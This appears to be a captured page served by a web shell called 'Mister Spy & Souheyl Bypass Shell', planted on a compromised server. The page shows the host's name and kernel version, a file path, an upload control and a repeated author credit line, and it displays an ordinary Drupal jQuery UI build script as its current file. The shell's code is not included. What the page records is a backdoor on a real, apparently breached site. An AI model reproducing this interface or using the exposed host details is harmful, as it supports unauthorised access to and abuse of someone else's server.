Welcome To Our Shell

Mister Spy & Souheyl Bypass Shell

Current Path : /var/www/html_old/abh/web/core/scripts/js/

Linux ift1.ift-informatik.de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
Upload File :
Current File : /var/www/html_old/abh/web/core/scripts/js/jqueryui-build.js

/**
 * @file
 *
 * Provides the build:jqueryui command to minify *.js source files.
 *
 * Run build:jqueryui with --file to only parse a specific file.
 * @example <caption>Only process assets/vendor/jquery.ui/ui/widget.js and
 * assets/vendor/jquery.ui/ui/plugin.js</caption
 * yarn run build:jqueryui --file assets/vendor/jquery.ui/ui/widget.js --file
 * assets/vendor/jquery.ui/ui/plugin.js
 * @example <caption>Check if all files have been compiled correctly</caption>
 * yarn run build:jqueryui --check
 *
 * @internal This file is part of the core javascript build process and is only
 * meant to be used in that context.
 */

'use strict';

const glob = require('glob');
const argv = require('minimist')(process.argv.slice(2));
const check = require('./jqueryui-check');
const minify = require('./jqueryui-terser');
const log = require('./log');

// Match only on jQuery UI .js files.
const fileMatch = './assets/vendor/jquery.ui/**/!(*-min).js';
const processFiles = (error, filePaths) => {
  if (error) {
    process.exitCode = 1;
  }
  // Process all the found files.
  let callback = minify;
  if (argv.check) {
    callback = check;
  }
  filePaths.forEach(callback);
};

if (argv.file) {
  processFiles(null, [].concat(argv.file));
}
else {
  glob(fileMatch, {}, processFiles);
}
process.exitCode = 0;

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped) Email: contact@elmoujehidin.net